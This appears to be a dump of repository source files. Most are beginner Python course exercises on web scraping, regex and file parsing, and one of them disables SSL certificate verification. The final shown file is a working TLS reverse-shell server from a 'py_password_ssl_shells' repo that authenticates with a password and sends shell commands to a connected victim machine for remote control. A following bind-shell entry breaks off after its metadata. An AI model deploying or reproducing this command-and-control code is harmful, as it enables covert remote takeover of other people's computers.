"avg_line_length": 44.98181915283203,
"blob_id": "c915f4339647f0c35b59e3a966f6b32c698cf698",
"content_id": "19284f7865d25b11732703eec8391d78cf1b5bd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2528,
"license_type": "no_license",
"max_line_length": 431,
"num_lines": 55,
"path": "/_site/12.7.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\nFollowing Links in Python\n\nIn this assignment you will write a Python program that expands on http://www.py4e.com/code3/urllinks.py. The program will use urllib to read the HTML from the data files below, extract the href= vaues from the anchor tags, scan for a tag that is in a particular position relative to the first name in the list, follow that link and repeat the process a number of times and report the last name you find.\n\nWe provide two files for this assignment. One is a sample file where we give you the name for your testing and the other is the actual data you need to process for the assignment\n\nSample problem: Start at http://py4e-data.dr-chuck.net/known_by_Fikret.html \nFind the link at position 3 (the first name is 1). Follow that link. Repeat this process 4 times. The answer is the last name that you retrieve.\nSequence of names: Fikret Montgomery Mhairade Butchi Anayah \nLast name in sequence: Anayah\nActual problem: Start at: http://py4e-data.dr-chuck.net/known_by_Daymian.html \nFind the link at position 18 (the first name is 1). Follow that link. Repeat this process 7 times. The answer is the last name that you retrieve.\nHint: The first character of the name of the last page that you will load is: M\nStrategy\nThe web pages tweak the height between the links and hide the page after a few seconds to make it difficult for you to do the assignment without writing a Python program. But frankly with a little effort and patience you can overcome these attempts to make it a little harder to complete the assignment without writing a Python program. But that is not the point. The point is to write a clever Python program to solve the program.\n'''\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport ssl\nimport re\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter URL: ')\ncount = int(input('Enter count: '))\nposition = int(input('Enter position: '))\n\n# url = 'http://py4e-data.dr-chuck.net/known_by_Daymian.html'\n# count = 7\n# position = 18\nrep = 0\n\n# Loop based on count\nfor x in range(0, count) :\n html = urlopen(url, context=ctx).read()\n soup = BeautifulSoup(html, \"html.parser\")\n print('Retrieving', url)\n count = 0\n # Retrieve all of the anchor tags\n tags = soup('a')\n # Loop based on position\n for tag in tags :\n this_tag = tag.get('href', None)\n rep += 1\n # Set new url to href in position\n if rep == position :\n url = this_tag\n rep = 0\n break\n \nprint('Retrieving', url)"
},
{
"alpha_fraction": 0.7082018852233887,
"alphanum_fraction": 0.7255520224571228,
"avg_line_length": 29.095237731933594,
"blob_id": "76333de3672b31112f82677bb44cf1ee6c240437",
"content_id": "e5d2c644a011372b97faddb83754ebbb66648298",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 21,
"path": "/_site/11.3.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\nFinding Numbers in a Haystack\n\nIn this assignment you will read through and parse a file with text and numbers. You will extract all the numbers in the file and compute the sum of the numbers.\n\nHandling The Data\nThe basic outline of this problem is to read the file, look for integers using the re.findall(), looking for a regular expression of '[0-9]+' and then converting the extracted strings to integers and summing up the integers.\n'''\n\nimport re\n\nname = 'regex_sum_100089.txt'\nhandle = open(name)\n\nsum = 0\nfor line in handle :\n nums = re.findall('[0-9]+', line)\n for each in nums :\n sum = sum + int(each)\n\nprint(sum)\n "
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5735294222831726,
"avg_line_length": 16.125,
"blob_id": "9d57691999518ba53e303384590b39960757ec55",
"content_id": "6033b7732ac92ff60c8d6fb94d3175299f66e544",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 8,
"path": "/3.1.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "hrs = input(\"Enter Hours: \")\nh = float(hrs)\nr = float(input(\"Enter rate: \"))\n\nif h <= 40:\n\tprint(40*r)\nelse:\n\tprint(40*r + (h-40)*r*1.5)"
},
{
"alpha_fraction": 0.6018518805503845,
"alphanum_fraction": 0.6203703880310059,
"avg_line_length": 14.571428298950195,
"blob_id": "42bbb8a6031f962b6347a3d5c4ea893ea2eea2b6",
"content_id": "13cd41a2ff538c17d4d896ef88a4a93140f4ee7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 7,
"path": "/test.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "fhand = open('mbox.txt', \"r\")\ncount = 0\n\nfor line in fhand:\n count = count + 1\n\nprint('Line Count:', count)"
},
{
"alpha_fraction": 0.7209756374359131,
"alphanum_fraction": 0.7268292903900146,
"avg_line_length": 38.46154022216797,
"blob_id": "8c9e0cf46241948a7ad2f35aba2c98795335efa9",
"content_id": "398b30a71c57815023dfb91796a1f6187f53dcde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 502,
"num_lines": 26,
"path": "/9.4.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\n9.4 Write a program to read through the mbox-short.txt and figure out who has the sent the greatest number of mail messages. The program looks for 'From ' lines and takes the second word of those lines as the person who sent the mail. The program creates a Python dictionary that maps the sender's mail address to a count of the number of times they appear in the file. After the dictionary is produced, the program reads through the dictionary using a maximum loop to find the most prolific committer.\n'''\n\nname = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\n#name = \"mbox-short.txt\"\n\nhandle = open(name)\ncounts = dict()\n\nfor line in handle:\n if not line.startswith(\"From \") : continue\n current = (line.rstrip()).split()\n email = (current[1])\n counts[email] = counts.get(email, 0) + 1\n\ntop_emailer = None\nemail_count = None\n\nfor emailer, emails in counts.items():\n if top_emailer is None or emails > email_count:\n top_emailer = emailer\n email_count = emails\n\nprint(top_emailer, email_count)"
}
] | 7 |
sureshmariadass/scorm
|
https://github.com/sureshmariadass/scorm
|
407e55aeff0faabe7aae4a64bb921c84eadb0940
|
b04e6df88dee0f402ea3809b51e6db8649e4db59
|
17ffe2a771d5f948faecf909c6976e8b6273c6d4
|
refs/heads/master
| 2020-05-26T12:13:11.129549 | 2019-05-23T12:27:52 | 2019-05-23T12:27:52 | 188,227,849 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7731958627700806,
"alphanum_fraction": 0.7731958627700806,
"avg_line_length": 18.399999618530273,
"blob_id": "418108ab71083ba56bbacf86d5467e49e1c43684",
"content_id": "6ea1422377196898e16cbc7cec241a3ee50715c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 97,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 5,
"path": "/scormplayer/apps.py",
"repo_name": "sureshmariadass/scorm",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ScormplayerConfig(AppConfig):\n name = 'scormplayer'\n"
},
{
"alpha_fraction": 0.744027316570282,
"alphanum_fraction": 0.7508532404899597,
"avg_line_length": 28.299999237060547,
"blob_id": "74d0f5f04fdaa8d502bb6ac987ab8146597583d6",
"content_id": "dcda7c689b069133710bed34337bf7406577cb6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 10,
"path": "/scormplayer/views.py",
"repo_name": "sureshmariadass/scorm",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.shortcuts import render,redirect\n# Create your views here.\ndef index(request):\n return render(request,'index.html')\ndef index2(request):\n return render(request,'index2.html')\ndef apihtml(request):\n return render(request,'api.html')\n"
},
{
"alpha_fraction": 0.8048780560493469,
"alphanum_fraction": 0.8048780560493469,
"avg_line_length": 19.5,
"blob_id": "ed35cd6a3d0d1b23f3f99f1a30a64669427f77e0",
"content_id": "eb90fa7f970f2f937719791635924037c126372e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 41,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sureshmariadass/scorm",
"src_encoding": "UTF-8",
"text": "# scorm\nsimple scorm player using django\n"
}
] | 3 |
EjuluWilson/Django-Travello-WebApp
|
https://github.com/EjuluWilson/Django-Travello-WebApp
|
bbb80a2a523203929d89390c4f03c0ce5d8e2840
|
d27dcb3ff0fe26410d7390849ecc27021c7367e3
|
0254bfcb1fc5a9219252bd74c2b7123d0ea1ad9c
|
refs/heads/master
| 2021-05-23T12:00:04.131214 | 2020-04-05T16:28:57 | 2020-04-05T16:28:57 | 253,276,167 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6848000288009644,
"alphanum_fraction": 0.7167999744415283,
"avg_line_length": 37.9375,
"blob_id": "2f0945ee3900cc4c52cd60e7b3a9607bca1da8da",
"content_id": "ec923cffa5f0202d070151b0b16aa9fd6951a63a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 625,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/travello/views.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Destination\n\n#Create your views here.\ndest1 = Destination(\"Atutur\",\"my birth place\",\"500k\",\"destination_2.jpg\",True)\ndest2 = Destination(\"Bukedea\",\"cool place\",\"700k\",\"destination_6.jpg\")\ndest3 = Destination(\"Kumi\",\"try it out\",\"800k\",\"destination_4.jpg\")\n\ndests = [dest1,dest2,dest3] #object array\n\ndef launch_travello(request):\n\n #pass the destination object to the HTML\n return render(request,\"index.html\",{\"dests\":dests})\n #You will thereafter be able to call these objects using {{}} in the HTML\n #call example: {{dests.0.name}} == dests.dest1.name\n\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 12.033333778381348,
"blob_id": "72f668212304eb207b29728a4dbb22f3fe06aa20",
"content_id": "77738d3db2bb7e0e0902311c3dd9f2f4b407d200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 392,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 30,
"path": "/travello/models.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#This models.py is ment for database access hoever yo can also retrive data from python code\n\nclass Destination:\n\n def __init__(self,name,description,price,image,offer = False):\n self.name = name\n self.img = image\n self.desc = description\n self.price = price\n self.offer = offer\n\n"
},
{
"alpha_fraction": 0.6325300931930542,
"alphanum_fraction": 0.6325300931930542,
"avg_line_length": 19.875,
"blob_id": "192221a9d6f820b2b99b9b66dd4b4ddbe66c9e4f",
"content_id": "4fc9b4925f5f75a3c33caa085594d9ec4dda3802",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 166,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/calc/urls.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home,name=\"HOME\"),\n path('sum', views.add),\n path('to_calc', views.calc),\n]"
},
{
"alpha_fraction": 0.705050528049469,
"alphanum_fraction": 0.7090908885002136,
"avg_line_length": 28.117647171020508,
"blob_id": "ff6a8243ccd52e2485bac396094308f817ce92bc",
"content_id": "c63d22ab186c914e0c86058592a011bcb6a01cc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/calc/views.py",
"repo_name": "EjuluWilson/Django-Travello-WebApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\ndef home(request): \n return render(request,\"home.html\") #launch the home.html template\n\n# this functio requests/launches/calls the input.html template\ndef calc(request):\n return render(request,\"inputs.html\")\n\n\n#function returns a sum on the the template results.thml\ndef add(request):\n x = request.POST[\"num1\"]\n y = request.POST[\"num2\"]\n sum = int(x)+int(y)\n #seend to results.html\n return render(request,\"results.html\",{\"result\":sum})\n"
}
] | 4 |
celestialbunny/10_inventory_management
|
https://github.com/celestialbunny/10_inventory_management
|
24c72a167f4b18aa0d9cc07b4eb2eaa2535a2110
|
a2f9ed809e3b25b6b6de12d3f641ef45775fc5aa
|
8e538741e77dee464de63b1838f8f1d1de238c70
|
refs/heads/master
| 2022-12-23T01:35:50.512355 | 2019-02-19T06:32:57 | 2019-02-19T06:32:57 | 171,193,823 | 0 | 0 | null | 2019-02-18T01:23:54 | 2019-02-19T06:33:10 | 2022-12-08T01:37:13 |
HTML
|
[
{
"alpha_fraction": 0.7736625671386719,
"alphanum_fraction": 0.7736625671386719,
"avg_line_length": 17.769229888916016,
"blob_id": "8183816813a832c84f96eba717f9a57aa319a5cf",
"content_id": "555417432e655f61f171f69d5dae9c06454170db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 13,
"path": "/forms.py",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "from wtforms import Form\nfrom wtforms.fields import StringField\nfrom wtforms.validators import DataRequired\n\nfrom models import Store\n\nclass RegisterStore(Form):\n\tstore_name = StringField(\n\t\t'Storename',\n\t\tvalidators=[\n\t\t\tDataRequired()\n\t\t]\n\t)"
},
{
"alpha_fraction": 0.6987179517745972,
"alphanum_fraction": 0.7008547186851501,
"avg_line_length": 30.509614944458008,
"blob_id": "a40c1b11fea89303657f6da0a568af1b98e2e1af",
"content_id": "9bb6ad839390b06bab340044155f11deab24b146",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3276,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 104,
"path": "/server.py",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "import peeweedbevolve\nfrom flask import (Flask, render_template, request, flash, redirect, url_for)\nfrom models import db, Store, Warehouse, Product\nfrom peewee import *\n\n# python -c 'import os; print(os.urandom(16))'\n# b'_5#y2L\"F4Q8z\\n\\xec]/\n\napp = Flask(__name__)\napp.secret_key = 'secret_key!'\n\[email protected]_request\ndef before_request():\n\tdb.connect()\n\[email protected]_request\ndef after_request(response):\n\tdb.close()\n\treturn response\n\[email protected]()\ndef migrate():\n\tdb.evolve(ignore_tables={'base_model'})\n\n'''\nStart of the own declared directory\n'''\n\[email protected](\"/\")\ndef index():\n\treturn render_template('index.html')\n\[email protected](\"/contact\")\ndef contact():\n\treturn render_template('contact.html')\n\[email protected](\"/store\", methods=['GET', 'POST'])\ndef store():\n\t# form = forms.Store()\n\t# store_list = Store.select()\n\tstore_list = Store.select()\n\tpayload = []\n\tfor store in store_list:\n\t\tnew_object = {\n\t\t\t\"store_name\": store.name,\n\t\t\t\"num\": len(list(store.warehouses))\n\t\t}\n\t\tpayload.append(new_object)\n\tif request.method == 'POST':\n\t\t# How to post a success message from form submission if not using flash but using bootstrap under 'store.html' line 5\n\t\t# breakpoint()\n\t\tnew_store = Store(name=request.form['store_name'])\n\t\tnew_store.save()\n\t\tflash(\"Store created\", \"success\")\n\t\treturn redirect(url_for('store'), store_list)\n\telse:\n\t\treturn render_template('store.html', payload=payload)\n\[email protected](\"/store/<int:store_number>\", methods=['GET', 'POST'])\ndef store_info(store_number):\n\tif request.method == 'POST':\n\t\tnew_store_name = request.form['new_store_name']\n\t\tStore.update({Store.name: new_store_name}).where(Store.id == store_number)\n\t\treturn redirect(url_for('store/index'))\n\telse:\n\t\tstore_id = Store.select().where(Store.id == store_number)\n\t\tnum_of_wh = True\n\t\tfor store in store_id:\n\t\t\tnum_of_wh = len(list(store.warehouses))\n\t\treturn render_template('store_page.html', store_id=store_id, num_of_wh=num_of_wh)\n\[email protected](\"/warehouse\", methods=['GET', 'POST'])\ndef warehouse():\n\tif request.method == 'POST':\n\t\tstore = request.form['store_list']\n\t\tlocation = request.form['warehouse_location']\n\t\tnew_warehouse = Warehouse.create(location=location, store=store)\n\t\tnew_warehouse.save()\n\t\tflash(\"Warehouse created\", \"success\")\n\t\treturn redirect(url_for('warehouse'))\n\telse:\n\t\t# result = Store.select(Store.name, fn.COUNT(Warehouse.store.id == Store.id)).join(Warehouse).group_by(Store.name).where(Store.id == Warehouse.store.id)\n\t\twarehouse_list = Warehouse.select()\n\t\tstore_list = Store.select()\n\t\treturn render_template('warehouse.html', warehouse_list=warehouse_list, store_list=store_list)\n\[email protected](\"/product\", methods=['GET', 'POST'])\ndef product():\n\tif request.method == 'POST':\n\t\tname = request.form['product_name']\n\t\tdescription = request.form['product_description']\n\t\twarehouse = request.form['warehouse_list']\n\t\tcolor = request.form['product_color']\n\t\tnew_product = Product(name=name, description=description, warehouse=warehouse, color=color)\n\t\tnew_product.save()\n\t\tflash(\"Product created\", \"success\")\n\t\treturn redirect(url_for('product'))\n\telse:\n\t\tproduct_list = Product.select()\n\t\twarehouse_list = Warehouse.select()\n\t\treturn render_template('product.html', warehouse_list=warehouse_list, product_list=product_list)\n\nif __name__ == '__main__':\n\tapp.run()"
},
{
"alpha_fraction": 0.507196307182312,
"alphanum_fraction": 0.6986182928085327,
"avg_line_length": 16.02941131591797,
"blob_id": "9fe73c32150738604aac3af2382ed3923106be42",
"content_id": "1d822dd610270183d60031f85605fe526604bce2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 3474,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 204,
"path": "/requirements.txt",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "alabaster==0.7.12\nanaconda-client==1.7.2\nanaconda-navigator==1.9.6\nanaconda-project==0.8.2\nasn1crypto==0.24.0\nastroid==2.1.0\nastropy==3.1.1\natomicwrites==1.3.0\nattrs==18.2.0\nBabel==2.6.0\nbackcall==0.1.0\nbackports.os==0.1.1\nbackports.shutil-get-terminal-size==1.0.0\nbcrypt==3.1.6\nbeautifulsoup4==4.7.1\nbitarray==0.8.3\nbkcharts==0.2\nblaze==0.11.3\nbleach==3.1.0\nbokeh==1.0.4\nboto==2.49.0\nBottleneck==1.2.1\ncertifi==2018.11.29\ncffi==1.11.5\nchardet==3.0.4\nClick==7.0\ncloudpickle==0.8.0\nclyent==1.2.2\ncolorama==0.4.1\ncomtypes==1.1.7\nconda==4.5.12\nconda-build==3.17.6\nconda-verify==3.1.1\ncontextlib2==0.5.5\ncryptography==2.4.2\ncycler==0.10.0\nCython==0.29.5\ncytoolz==0.9.0.1\ndask==1.1.1\ndatashape==0.5.4\ndecorator==4.3.2\ndefusedxml==0.5.0\ndistributed==1.25.3\ndocutils==0.14\nentrypoints==0.2.3\net-xmlfile==1.0.1\nfastcache==1.0.2\nfilelock==3.0.10\nFlask==1.0.2\nFlask-Bcrypt==0.7.1\nFlask-Cors==3.0.7\nFlask-Login==0.4.1\nfuture==0.17.1\ngevent==1.4.0\nglob2==0.6\ngreenlet==0.4.15\nh5py==2.9.0\nheapdict==1.0.0\nhtml5lib==1.0.1\nidna==2.8\nimageio==2.4.1\nimagesize==1.1.0\nimportlib-metadata==0.8\nipykernel==5.1.0\nipython==7.2.0\nipython-genutils==0.2.0\nipywidgets==7.4.2\nisort==4.3.4\nitsdangerous==1.1.0\njdcal==1.4\njedi==0.13.2\nJinja2==2.10\njsonschema==2.6.0\njupyter==1.0.0\njupyter-client==5.2.4\njupyter-console==6.0.0\njupyter-core==4.4.0\njupyterlab==0.35.4\njupyterlab-server==0.3.0\nkeyring==18.0.0\nkiwisolver==1.0.1\nlazy-object-proxy==1.3.1\nlibarchive-c==2.8\nllvmlite==0.26.0\nlocket==0.2.0\nlxml==4.3.1\nMarkupSafe==1.1.0\nmatplotlib==3.0.2\nmccabe==0.6.1\nmenuinst==1.4.14\nmistune==0.8.4\nmkl-fft==1.0.6\nmkl-random==1.0.2\nmore-itertools==6.0.0\nmpmath==1.1.0\nmsgpack==0.6.1\nmultipledispatch==0.6.0\nnavigator-updater==0.2.1\nnbconvert==5.4.1\nnbformat==4.4.0\nnetworkx==2.2\nnltk==3.4\nnose==1.3.7\nnotebook==5.7.4\nnumba==0.41.0\nnumexpr==2.6.9\nnumpy==1.16.1\nnumpydoc==0.8.0\nodo==0.5.1\nolefile==0.46\nopenpyxl==2.6.0\npackaging==19.0\npandas==0.24.1\npandocfilters==1.4.2\nparso==0.3.4\npartd==0.3.9\npath.py==11.5.0\npathlib2==2.3.3\npatsy==0.5.1\npeewee==3.8.2\npep8==1.7.1\npickleshare==0.7.5\nPillow==5.4.1\npkginfo==1.5.0.1\npluggy==0.8.1\nply==3.11\npostgres==2.2.2\nprometheus-client==0.5.0\nprompt-toolkit==2.0.8\npsutil==5.5.1\npsycopg2-binary==2.7.7\npy==1.7.0\npycodestyle==2.5.0\npycosat==0.6.3\npycparser==2.19\npycrypto==2.6.1\npycurl==7.43.0.2\npyflakes==2.1.0\nPygments==2.3.1\npylint==2.2.2\npyodbc==4.0.25\npyOpenSSL==19.0.0\npyparsing==2.3.1\nPySocks==1.6.8\npytest==4.2.1\npytest-arraydiff==0.3\npytest-astropy==0.5.0\npytest-doctestplus==0.2.0\npytest-openfiles==0.3.2\npytest-remotedata==0.3.1\npython-dateutil==2.8.0\npytz==2018.9\nPyWavelets==1.0.1\npywin32==223\npywinpty==0.5.5\nPyYAML==3.13\npyzmq==17.1.2\nQtAwesome==0.5.6\nqtconsole==4.4.3\nQtPy==1.6.0\nrequests==2.21.0\nrope==0.12.0\nruamel-yaml==0.15.46\nscikit-image==0.14.2\nscikit-learn==0.20.2\nscipy==1.2.1\nseaborn==0.9.0\nSend2Trash==1.5.0\nsimplegeneric==0.8.1\nsingledispatch==3.4.0.3\nsix==1.12.0\nsnowballstemmer==1.2.1\nsortedcollections==1.1.2\nsortedcontainers==2.1.0\nSphinx==1.8.4\nsphinxcontrib-websupport==1.1.0\nspyder==3.3.3\nspyder-kernels==1.3.2\nSQLAlchemy==1.2.18\nstatsmodels==0.9.0\nsympy==1.3\ntables==3.4.4\ntblib==1.3.2\nterminado==0.8.1\ntestpath==0.4.2\ntoolz==0.9.0\ntornado==5.1.1\ntqdm==4.31.1\ntraitlets==4.3.2\nunicodecsv==0.14.1\nurllib3==1.24.1\nwcwidth==0.1.7\nwebencodings==0.5.1\nWerkzeug==0.14.1\nwidgetsnbextension==3.4.2\nwin-inet-pton==1.0.1\nwin-unicode-console==0.5\nwincertstore==0.2\nwrapt==1.11.1\nxlrd==1.2.0\nXlsxWriter==1.1.4\nxlwings==0.15.2\nxlwt==1.3.0\nzict==0.1.3\n"
},
{
"alpha_fraction": 0.6346749067306519,
"alphanum_fraction": 0.6359133124351501,
"avg_line_length": 28.925926208496094,
"blob_id": "506ac6735bc79af3347ed69f4e43f17e32080675",
"content_id": "bc4b6ec7755a0db3c0d44aba2f1c8311e2bb59b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1615,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 54,
"path": "/templates/warehouse.html",
"repo_name": "celestialbunny/10_inventory_management",
"src_encoding": "UTF-8",
"text": "{% extends \"_layout.html\" %}\n\n{% block content %}\n<!-- lookout for get_flashed_messages(), every flashed messsage will be saved here -->\n\n{% with messages = get_flashed_messages() %}\n{% if messages %}\n<div class=\"alert alert-success alert-dismissible fade show\" role=\"alert\">\n\t<strong>Warehouse created!</strong>\n\t<button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\">\n\t\t<span aria-hidden=\"true\">×</span>\n\t</button>\n</div>\n{% endif %}\n{% endwith %}\n\n<h1>Warehouses</h1>\n<table class=\"table\">\n\t<thead>\n\t\t<tr>\n\t\t\t<th scope=\"col\">Warehouse Store</th>\n\t\t\t<th scope=\"col\">Warehouse Location</th>\n\t\t</tr>\n\t</thead>\n\t<tbody>\n\t\t{% if warehouse_list %}\n\t\t\t{% for warehouse in warehouse_list %}\n\t\t\t\t<tr>\n\t\t\t\t\t<td>{{ warehouse.store_id }}</td>\n\t\t\t\t\t<td>{{ warehouse.location }}</td>\n\t\t\t\t</tr>\n\t\t\t{% endfor %}\n\t\t{% else %}\n\t\t{% endif %}\n\t</tbody>\n</table>\n\n<form action=\"{{ url_for('warehouse') }}\" method=\"POST\">\n\t<div class=\"form-group\">\n\t\t<label for=\"warehouse_location\">Name of warehouse:</label>\n\t\t<input type=\"text\" class=\"form-control\" name=\"warehouse_location\" id=\"warehouse_location\" placeholder=\"Name of warehouse to be created\">\n\t</div>\n\t<div class=\"form-group\">\n\t\t<label for=\"store_list\">Location of warehouse:</label>\n\t\t<select name=\"store_list\" id=\"store_list\">\n\t\t\t<option disabled selected value> -- Select available store -- </option>\n\t\t\t{% for store in store_list %}\n\t\t\t\t<option name=\"store_id\" value=\"{{ store.id }}\">{{ store.name }} - {{ store.id }}</option>\n\t\t\t{% endfor %}\n\t\t</select>\n\t</div>\n\t<button type=\"submit\" class=\"btn btn-primary\">Submit</button>\n</form>\n{% endblock %}"
}
] | 4 |
darkerego/py_password_ssl_shells
|
https://github.com/darkerego/py_password_ssl_shells
|
360840940b9f98a0b6d79a19758ca24cc719fd72
|
809fb88e7c71dd2ab34f543edc14140875284ba2
|
4e12882cdf9a1fa191aa48f4588c64d21f02bedf
|
refs/heads/master
| 2020-09-01T17:06:14.746773 | 2019-11-01T15:30:32 | 2019-11-01T15:30:32 | 219,012,064 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5566655397415161,
"alphanum_fraction": 0.5711333155632019,
"avg_line_length": 27.460784912109375,
"blob_id": "424cf7765e48f54d72074b78de9d1e24b345b683",
"content_id": "1370e74c4a83497b3a990edcd5d3121774f11200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2903,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 102,
"path": "/reverse/server.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\nPySslShells - Reverse Shell Server\nAuthor: Darkerego <[email protected]>\n\"\"\"\nimport ssl\nimport socket\nfrom sys import exit\nfrom time import sleep\n\n# ip address of server, can use own computer's private IP if doing on local\n\nhost = '127.0.0.1'\nport = int(9999)\npw = 'lol'\ndebug = True\n\n\ndef create_socket():\n try:\n global host\n global port\n global s\n host = ''\n port = 9999\n # don't use common ports like 80, 3389\n\n s = socket.socket() # actual conversation between server and client\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Set is so that when we cancel out we can reuse port.\n except socket.error as msg:\n print(\"Error creating socket: \" + str(msg))\n else:\n s = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key',\n ssl_version=ssl.PROTOCOL_TLSv1)\n\n\n# binds socket to port and wait for connection from client/target\ndef socket_bind():\n try:\n global host\n global port\n global s\n print(\"Binding socket to port: \" + str(port))\n try:\n s.bind((host, port))\n except OSError:\n print('Address already in use. Quitting.')\n exit(1)\n s.listen(5)\n except socket.error as msg:\n print(\"Error binding socket to port: \" + str(msg) + \"\\n\" + \"Retrying in ten seconds...\")\n sleep(10)\n socket_bind()\n\n\n# establish connection with client (socket must be listening for connections)\ndef socket_accept():\n conn, address = s.accept()\n print(\"Connection has been established | \" + \"IP \" + address[0] + \" | Port \" + str(address[1]))\n send_commands(conn)\n conn.close()\n\n\n# sends commands to target/client computer to remote-control it\ndef send_commands(conn):\n authenticated = False\n if not authenticated:\n pw = input('Password: ')\n conn.send(str.encode(pw))\n response = str(conn.recv(1024), \"utf-8\")\n if response != 'Invalid password\\n':\n print(response, end='')\n else:\n print('ERROR authenticating: %s ' % response)\n conn.close()\n exit(1)\n while True: # infinite loop for connection to stay constant\n try:\n cmd = input() # cmd = command we type into terminal to send to client\n except KeyboardInterrupt:\n print('\\nCaught Signal, exiting ...\\n')\n conn.close()\n exit(1)\n else:\n if cmd == '__quit__':\n conn.send(str.encode(cmd))\n conn.close()\n exit()\n if len(str.encode(cmd)) > 0:\n conn.send(str.encode(cmd))\n client_response = str(conn.recv(4096), \"utf-8\")\n print(client_response, end=\"\") #\n\n\ndef main():\n\n create_socket()\n socket_bind()\n socket_accept()\n\n\nmain()\n"
},
{
"alpha_fraction": 0.4749022126197815,
"alphanum_fraction": 0.5032594799995422,
"avg_line_length": 29.989898681640625,
"blob_id": "5f958d7e76f61b9cdf8a73b912523fc5d4703dda",
"content_id": "e6d87aa3eb54f8f1b977c3d5084d69ec3de05647",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3068,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 99,
"path": "/bind/bind_shell.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
